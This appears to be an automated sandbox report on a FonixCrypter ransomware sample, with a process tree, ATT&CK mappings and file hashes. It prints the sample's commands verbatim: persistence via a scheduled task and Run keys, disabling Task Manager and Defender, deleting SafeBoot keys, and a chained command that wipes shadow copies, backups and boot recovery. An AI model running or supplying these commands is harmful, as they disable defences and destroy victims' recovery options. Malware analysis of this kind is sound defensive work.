Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4356 wrote to memory of 4120	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	82
PID 4356 wrote to memory of 4120	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	82
PID 4356 wrote to memory of 4120	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	82
PID 4120 wrote to memory of 4424	4120	cmd.exe	83
PID 4120 wrote to memory of 4424	4120	cmd.exe	83
PID 4120 wrote to memory of 4424	4120	cmd.exe	83
PID 4356 wrote to memory of 1884	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	84
PID 4356 wrote to memory of 1884	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	84
PID 4356 wrote to memory of 1884	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	84
PID 1884 wrote to memory of 4904	1884	cmd.exe	85
PID 1884 wrote to memory of 4904	1884	cmd.exe	85
PID 1884 wrote to memory of 4904	1884	cmd.exe	85
PID 4356 wrote to memory of 4820	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	86
PID 4356 wrote to memory of 4820	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	86
PID 4356 wrote to memory of 4820	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	86
PID 4820 wrote to memory of 4872	4820	cmd.exe	87
PID 4820 wrote to memory of 4872	4820	cmd.exe	87
PID 4820 wrote to memory of 4872	4820	cmd.exe	87
PID 4356 wrote to memory of 4900	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	93
PID 4356 wrote to memory of 4900	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	93
PID 4356 wrote to memory of 4900	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	93
PID 4900 wrote to memory of 2416	4900	cmd.exe	88
PID 4900 wrote to memory of 2416	4900	cmd.exe	88
PID 4900 wrote to memory of 2416	4900	cmd.exe	88
PID 4356 wrote to memory of 4148	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	89
PID 4356 wrote to memory of 4148	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	89
PID 4356 wrote to memory of 4148	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	89
PID 4148 wrote to memory of 2976	4148	cmd.exe	91
PID 4148 wrote to memory of 2976	4148	cmd.exe	91
PID 4148 wrote to memory of 2976	4148	cmd.exe	91
PID 4356 wrote to memory of 2508	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	90
PID 4356 wrote to memory of 2508	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	90
PID 4356 wrote to memory of 2508	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	90
PID 2508 wrote to memory of 2596	2508	cmd.exe	92
PID 2508 wrote to memory of 2596	2508	cmd.exe	92
PID 2508 wrote to memory of 2596	2508	cmd.exe	92
PID 4356 wrote to memory of 2084	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	94
PID 4356 wrote to memory of 2084	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	94
PID 4356 wrote to memory of 2084	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	94
PID 2084 wrote to memory of 4248	2084	cmd.exe	95
PID 2084 wrote to memory of 4248	2084	cmd.exe	95
PID 2084 wrote to memory of 4248	2084	cmd.exe	95
PID 4356 wrote to memory of 5048	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	96
PID 4356 wrote to memory of 5048	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	96
PID 4356 wrote to memory of 5048	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	96
PID 5048 wrote to memory of 3088	5048	cmd.exe	97
PID 5048 wrote to memory of 3088	5048	cmd.exe	97
PID 5048 wrote to memory of 3088	5048	cmd.exe	97
PID 4356 wrote to memory of 1520	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	98
PID 4356 wrote to memory of 1520	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	98
PID 4356 wrote to memory of 1520	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	98
PID 1520 wrote to memory of 1964	1520	cmd.exe	99
PID 1520 wrote to memory of 1964	1520	cmd.exe	99
PID 1520 wrote to memory of 1964	1520	cmd.exe	99
PID 4356 wrote to memory of 3716	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	103
PID 4356 wrote to memory of 3716	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	103
PID 4356 wrote to memory of 3716	4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	103
PID 3716 wrote to memory of 2172	3716	cmd.exe	104
PID 3716 wrote to memory of 2172	3716	cmd.exe	104
PID 3716 wrote to memory of 2172	3716	cmd.exe	104
PID 3716 wrote to memory of 4188	3716	cmd.exe	105
PID 3716 wrote to memory of 4188	3716	cmd.exe	105
PID 3716 wrote to memory of 4188	3716	cmd.exe	105
PID 3716 wrote to memory of 4348	3716	cmd.exe	108

C:\Users\Admin\AppData\Local\Temp\de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
"C:\Users\Admin\AppData\Local\Temp\de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe"
1⤵
- Drops startup file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4356
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix /TR %temp%/FonixCrypter.exe /RU SYSTEM /RL HIGHEST /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4120
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\Users\Admin\AppData\Local\Temp/FonixCrypter.exe /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:4424
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d %temp%FonixCrypter.exe /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1884
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonixCrypter.exe /f
    3⤵
    - Adds Run key to start application
    PID:4904
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d %temp%FonixCrypter.exe /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4820
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonixCrypter.exe /f
    3⤵
    - Adds Run key to start application
    PID:4872
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d %temp%FonixCrypter.exe /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4148
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonixCrypter.exe /f
    3⤵
    - Adds Run key to start application
    PID:2976
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2508
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:2596
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d %temp%FonixCrypter.exe /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4900
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2084
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:4248
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5048
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
    3⤵
    PID:3088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1520
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
    3⤵
    PID:1964
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd.exe /c vssadmin Delete Shadows /All /Quiet & wmic shadowcopy delete & bcdedit /set {default} boostatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet/ & icacls * /grant Everyone:(OI)(CI)F /T /C /Q
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3716
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c vssadmin Delete Shadows /All /Quiet
    3⤵
    PID:2172
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4188
- - C:\Windows\SysWOW64\icacls.exe
    icacls * /grant Everyone:(OI)(CI)F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4348
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy Cpriv.key %appdata%\Cpriv.key
  2⤵
  PID:3176
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy Cpub.key %appdata%\Cpub.key
  2⤵
  PID:4796
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy SystemID %appdata%\SystemID
  2⤵
  PID:3748

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonixCrypter.exe /f
1⤵
- Adds Run key to start application
PID:2416

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2180

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:3972

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:868

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\# How To Decrypt Files #.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Suspicious use of SetWindowsHookEx
PID:4788

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:2216
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:64

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffc188a46f8,0x7ffc188a4708,0x7ffc188a4718
  2⤵
  PID:1656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2200,12475827437618747555,7485560711102872106,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2
  2⤵
  PID:1596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2200,12475827437618747555,7485560711102872106,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3
  2⤵
  PID:4256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2200,12475827437618747555,7485560711102872106,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2104 /prefetch:8
  2⤵
  PID:5000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,12475827437618747555,7485560711102872106,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4008 /prefetch:1
  2⤵
  PID:1752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,12475827437618747555,7485560711102872106,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3056 /prefetch:1
  2⤵
  PID:2816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,12475827437618747555,7485560711102872106,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3984 /prefetch:1
  2⤵
  PID:1164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2200,12475827437618747555,7485560711102872106,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5536 /prefetch:8
  2⤵
  PID:3644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2200,12475827437618747555,7485560711102872106,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5752 /prefetch:8
  2⤵
  PID:936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,12475827437618747555,7485560711102872106,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:1
  2⤵
  PID:5020
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2200,12475827437618747555,7485560711102872106,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6488 /prefetch:8
  2⤵
  PID:820
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
  2⤵
  PID:5044
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x23c,0x240,0x244,0x21c,0x248,0x7ff6282e5460,0x7ff6282e5470,0x7ff6282e5480
    3⤵
    PID:1376
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2200,12475827437618747555,7485560711102872106,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6488 /prefetch:8
  2⤵
  PID:4716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,12475827437618747555,7485560711102872106,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6268 /prefetch:1
  2⤵
  PID:4628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,12475827437618747555,7485560711102872106,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6304 /prefetch:1
  2⤵
  PID:1736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2200,12475827437618747555,7485560711102872106,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5596 /prefetch:8
  2⤵
  PID:4352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,12475827437618747555,7485560711102872106,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
  2⤵
  PID:3860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2200,12475827437618747555,7485560711102872106,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6192 /prefetch:8
  2⤵
  PID:1292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,12475827437618747555,7485560711102872106,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1924 /prefetch:1
  2⤵
  PID:3180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,12475827437618747555,7485560711102872106,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6688 /prefetch:1
  2⤵
  PID:4864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2200,12475827437618747555,7485560711102872106,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6168 /prefetch:8
  2⤵
  PID:2188

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1340

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x308 0x3c4
1⤵
PID:4104

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 424 -p 2724 -ip 2724
1⤵
PID:4980

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2724 -s 11080
1⤵
- Program crash
PID:1372

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:3704

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\# How To Decrypt Files #.hta

Filesize
1KB

MD5
7aa4f8c1773bd491c694f30f2a2c1d61

SHA1
88273a45b990de010190967bdbc18fe404440310

SHA256
3449142723f88e5c601bf2b24cf9ffb21b0f493c22bee921ceecc8f6564a3016

SHA512
645b8e9cba3218bef1c6db1501c09e695abb4737857fae9c5845917be2c979de43ea09155f037004c7dc18357e6cdc5d0250387cf6f5e2aab84b11c616e0dca2

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\icudtl.dat

Filesize
11.4MB

MD5
c0999d725b2d0420e2e50e3a6c19afd9

SHA1
2e9a2c904e6f1b7dd58fdc5e32cb380e68a32363

SHA256
8b4f11471c52a606d2e938f3fc578d1b8c48dd23734fd8ed5cacaf5294019ac3

SHA512
fd968355d9334bff80092339a83e97d965bfd9d6e65e302577e3943d1c4a5416232ad3b617b7501e6ec4e62e88b1d10a89d0fea505fee7ec8ebeeca4e4a466ae

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20221024170157.pma

Filesize
1KB

MD5
7c59c5dfdb687faed3bfb8a27c914f77

SHA1
a5061c9d2d354ec0f7076c4c3aff22bb4035e6c2

SHA256
517e71ff84e79360939fb4ca1fc6246dace8108999b2cdbc6d852eab68892df0

SHA512
60c8dfd0d70ccff97acd2225758052413b9f8a90f7ddb5daef21537111b73ab515f44af43581d2cc5d7495f04db7b5695a884373b7f289661d815b108412aaf1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\0aae48ef-be05-4736-824d-b1563bdfd906.dmp

Filesize
3.3MB

MD5
5b95be8655fc8c4467e2dfc4b7f3ae72

SHA1
c55ca1e178128ba880f341e43bee3e9b2cfbb8b8

SHA256
6fd7d7c549e1e66b90590dbf040fcfa549a97b690d9db262f93f53649b0d0f59

SHA512
0962fa21c9f853483c69f97a78aee7e793d4c1b9f92193cee6bf3be33e85003c1a614a6ef472a174b6345f07dc09c75bbe14d0ba885cc1e977625380813ad5eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\d2464ba0-a54b-4bdb-a774-8a2b3ddf6399.dmp

Filesize
3.3MB

MD5
82bc500bab5e4f264e746087b2dc3c67

SHA1
1051934da9135b5a578e1469c778ff3f435750d6

SHA256
385b8aed2bc46f1f264a9a4677085153e0610dff562003b7b747ebdc8adacbcf

SHA512
fab7135fba75dc670eaaa1d62f3ce8f2842f29a4ce741a7821edee7748a9751063978e85794455b0795de7158f06760234c70fc1c9144fd2089a5e9379ad8a9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\f8b0de6b-74a4-4c5b-b62e-20a3bf90aaab.dmp

Filesize
3.3MB

MD5
1ee9105e5c74d4fcb0b61f884bb67d2e

SHA1
a76797bb351b33eb202c3debdf1570e0064367f3

SHA256
b550d36a41509832be790766c51a848d5abe985d1a28e5fd2ac0dfeede56d114

SHA512
1e0faa95d7061632c85b0b8db8d6be98cf6413995aa76489d8965e30d0c36d105688079723cd027ab69d49e3c812b94e5e7d9b3bda38c26351aba7274fb48f52

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
8be9513fd38b94d4f6b5011b68b60326

SHA1
47feef421fe8de09e36ca685e9cf19d404aa8917

SHA256
5bf3203e8be948e62917ebab13e1b21aec105c473089b233874fac8e5748bb2d

SHA512
cb3dbfa46f3ee28956deab38fefa8276f9efa6ea978ff6b7f810f7f9ba106ed569f017cf5c840ae90fc5f83a1e6dbe50efef8e3412f4f38452a00915b2cc58bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
858B

MD5
1ab19a162f9577f5accd26454fc8ba42

SHA1
308e20e53dd00b405622c9e4703a6750b091847d

SHA256
8a1e1601f1f01005a36f0e9c8f026f269950d6784ba95e7583f45130e887a293

SHA512
5aa9547c501ced2c77fcb977393d104a37e522dc3704da9ff23dd31cfe824f7abc7b0caf8be44299f524e112719aafe7b4eb2584be249b8f73a10b1d22d16897

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
7e73a2a1005d91023493276804276118

SHA1
63d941e9e3083ba1f44f76795c9c2901dc643e02

SHA256
c8384845b5b63dd9f759f0053a3a2a3c3a49a4abd24a1782deec72f7bb6441db

SHA512
81303ef866fb4f24564a07848004367c7215f803ae00e8fa1602b79c30daca8d0256ea273266eb53b2df0dc41b55fd74987a169817095de36067f29b88470801

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Filesize
11KB

MD5
